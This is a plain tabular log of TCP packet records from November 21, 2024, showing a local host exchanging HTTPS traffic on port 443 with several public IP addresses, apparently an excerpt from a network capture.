Nov 21, 2024 09:53:46.542495012 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:46.542577982 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.543045998 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.543066978 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:46.543200016 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.545202971 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.545231104 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:46.546063900 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.546094894 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:46.550354004 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.550374031 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:46.551306009 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.551351070 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:46.551809072 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.552639008 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:46.552665949 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:47.789125919 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:47.789200068 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:47.845608950 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:47.845659971 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:47.845845938 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:47.845856905 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:47.845997095 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:47.846054077 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:47.914642096 CET	443	49750	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:47.915699005 CET	49750	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:47.915739059 CET	443	49750	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:47.916388035 CET	49750	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:47.916399002 CET	443	49750	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:47.963465929 CET	443	49752	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:47.963988066 CET	49752	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:47.964009047 CET	443	49752	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:47.964560986 CET	49752	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:47.964566946 CET	443	49752	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:47.991519928 CET	443	49749	213.186.33.5	192.168.2.6
Nov 21, 2024 09:53:47.991595030 CET	49749	443	192.168.2.6	213.186.33.5
Nov 21, 2024 09:53:47.991776943 CET	49749	443	192.168.2.6	213.186.33.5
Nov 21, 2024 09:53:47.991827011 CET	443	49749	213.186.33.5	192.168.2.6
Nov 21, 2024 09:53:47.992362022 CET	49762	443	192.168.2.6	213.186.33.5
Nov 21, 2024 09:53:47.992408037 CET	443	49762	213.186.33.5	192.168.2.6
Nov 21, 2024 09:53:47.992469072 CET	49762	443	192.168.2.6	213.186.33.5
Nov 21, 2024 09:53:47.992777109 CET	49762	443	192.168.2.6	213.186.33.5
Nov 21, 2024 09:53:47.992791891 CET	443	49762	213.186.33.5	192.168.2.6
Nov 21, 2024 09:53:47.998296976 CET	443	49751	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:47.998783112 CET	49751	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:47.998821974 CET	443	49751	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:47.999413967 CET	49751	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:47.999428034 CET	443	49751	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.057697058 CET	443	49753	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.058362007 CET	49753	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.058396101 CET	443	49753	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.058979988 CET	49753	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.058985949 CET	443	49753	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.072278976 CET	443	49754	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.073046923 CET	49754	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.073065996 CET	443	49754	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.073622942 CET	49754	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.073631048 CET	443	49754	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.078746080 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.078814983 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.079277039 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.079377890 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.082741022 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.082741022 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.082750082 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.082767963 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.083022118 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.083333015 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.086195946 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.086206913 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.086606979 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.087507963 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.088327885 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.131324053 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.142368078 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.142445087 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.145956039 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.145971060 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.146131039 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.146141052 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.146311998 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.146389961 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.183434963 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.183511972 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.186402082 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.186435938 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.186707973 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.186728954 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.186886072 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.186954021 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.250296116 CET	443	49757	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:48.250390053 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:48.250946999 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:48.250978947 CET	443	49757	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:48.251337051 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:48.251353025 CET	443	49757	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:48.251451015 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:48.251462936 CET	443	49757	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:48.338061094 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:48.338135958 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:48.338145971 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:48.338186026 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:48.338426113 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:48.338481903 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:48.338495016 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:48.338537931 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:48.347024918 CET	49755	443	192.168.2.6	2.23.209.187
Nov 21, 2024 09:53:48.347039938 CET	443	49755	2.23.209.187	192.168.2.6
Nov 21, 2024 09:53:48.356616020 CET	443	49750	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.356668949 CET	443	49750	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.356928110 CET	49750	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.356966972 CET	49750	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.356973886 CET	443	49750	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.356995106 CET	49750	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.357002020 CET	443	49750	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.362560987 CET	49763	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.362602949 CET	443	49763	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.362648010 CET	49763	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.362787962 CET	49763	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.362798929 CET	443	49763	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.400599003 CET	443	49752	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.400656939 CET	443	49752	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.401264906 CET	49752	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.401316881 CET	49752	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.401316881 CET	49752	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.401340008 CET	443	49752	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.401355028 CET	443	49752	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.403645992 CET	49764	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.403691053 CET	443	49764	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.403983116 CET	49764	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.404207945 CET	49764	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.404223919 CET	443	49764	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.444461107 CET	443	49751	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.444541931 CET	443	49751	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.444627047 CET	49751	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.449135065 CET	49751	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.449166059 CET	443	49751	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.449182034 CET	49751	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.449188948 CET	443	49751	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.452888966 CET	49765	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.452917099 CET	443	49765	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.452991962 CET	49765	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.453161955 CET	49765	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.453178883 CET	443	49765	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.504209995 CET	443	49753	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.504280090 CET	443	49753	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.504328966 CET	49753	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.506958008 CET	49753	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.506973028 CET	443	49753	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.506983042 CET	49753	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.506988049 CET	443	49753	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.513621092 CET	49766	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.513678074 CET	443	49766	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.513782024 CET	49766	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.514229059 CET	49766	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.514244080 CET	443	49766	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.520771027 CET	443	49754	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.520853996 CET	443	49754	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.520920992 CET	49754	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.521044970 CET	49754	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.521064043 CET	443	49754	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.521083117 CET	49754	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.521095991 CET	443	49754	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.523252010 CET	49767	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.523300886 CET	443	49767	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.523355007 CET	49767	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.523474932 CET	49767	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:48.523492098 CET	443	49767	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:48.556832075 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.556862116 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.556878090 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.556921959 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.556932926 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.556977987 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.556977987 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.562319994 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.562351942 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.562371016 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.562380075 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.562391043 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.562408924 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.562450886 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.570926905 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.570966005 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.571026087 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.601191044 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.601205111 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.667630911 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.667659044 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.667678118 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.667695999 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.667738914 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.667763948 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.667763948 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.667781115 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.719634056 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.719665051 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.719683886 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.719741106 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.719741106 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.719815016 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.719860077 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.719882965 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.748792887 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.748817921 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.748898029 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.748919964 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.748941898 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.748960018 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.758883953 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.758920908 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.758982897 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.759013891 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.759041071 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.759134054 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.776212931 CET	443	49757	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:48.776269913 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:48.776329994 CET	443	49757	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:48.776367903 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:48.776384115 CET	443	49757	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:48.776428938 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:48.779648066 CET	49757	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:48.779673100 CET	443	49757	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:48.792995930 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.793039083 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.793119907 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.793134928 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.793165922 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.793272972 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.804939032 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.804965973 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.805041075 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.805113077 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.805149078 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.805193901 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.864964962 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.865012884 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.865068913 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.865109921 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.865133047 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.865151882 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.909638882 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.909679890 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.909729958 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.909753084 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.909775019 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.909791946 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.918939114 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.918965101 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.919055939 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.919055939 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.919075966 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.919140100 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.922710896 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.922744036 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.922832012 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.922858953 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.922877073 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.922898054 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.926279068 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.926310062 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.926371098 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.926389933 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.926403046 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.926429033 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.949660063 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.949688911 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.949776888 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.949776888 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.949794054 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.949879885 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.957782984 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.957823992 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.957865000 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.957880020 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.957907915 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.957923889 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.960577011 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.960612059 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.960680962 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.960700989 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.960717916 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.960740089 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.973176003 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.973195076 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.973371029 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.973371029 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.973393917 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.973474026 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.980263948 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.980298042 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.980348110 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.980360031 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.980390072 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.980449915 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.993993998 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.994014025 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.994182110 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:48.994214058 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:48.994659901 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.000849962 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.000881910 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.000948906 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.000962019 CET	443	49758	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.000998020 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.001025915 CET	49758	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.035161018 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:49.035211086 CET	443	49770	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:49.035340071 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:49.036031961 CET	49770	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:49.036045074 CET	443	49770	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:49.046303988 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.046349049 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.046430111 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.046498060 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.046539068 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.046809912 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.080440998 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.080478907 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.080538988 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.080568075 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.080598116 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.080620050 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.097666979 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.097692013 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.097740889 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.097748995 CET	443	49761	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.097810984 CET	49761	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.107023001 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.107049942 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.107100964 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.107136011 CET	443	49760	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.107155085 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.107199907 CET	49760	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.108267069 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.108302116 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.108350039 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.108386993 CET	443	49759	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:49.108412981 CET	49759	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:49.108551025 CET	49759	443	192.168.2.6	150.171.27.10
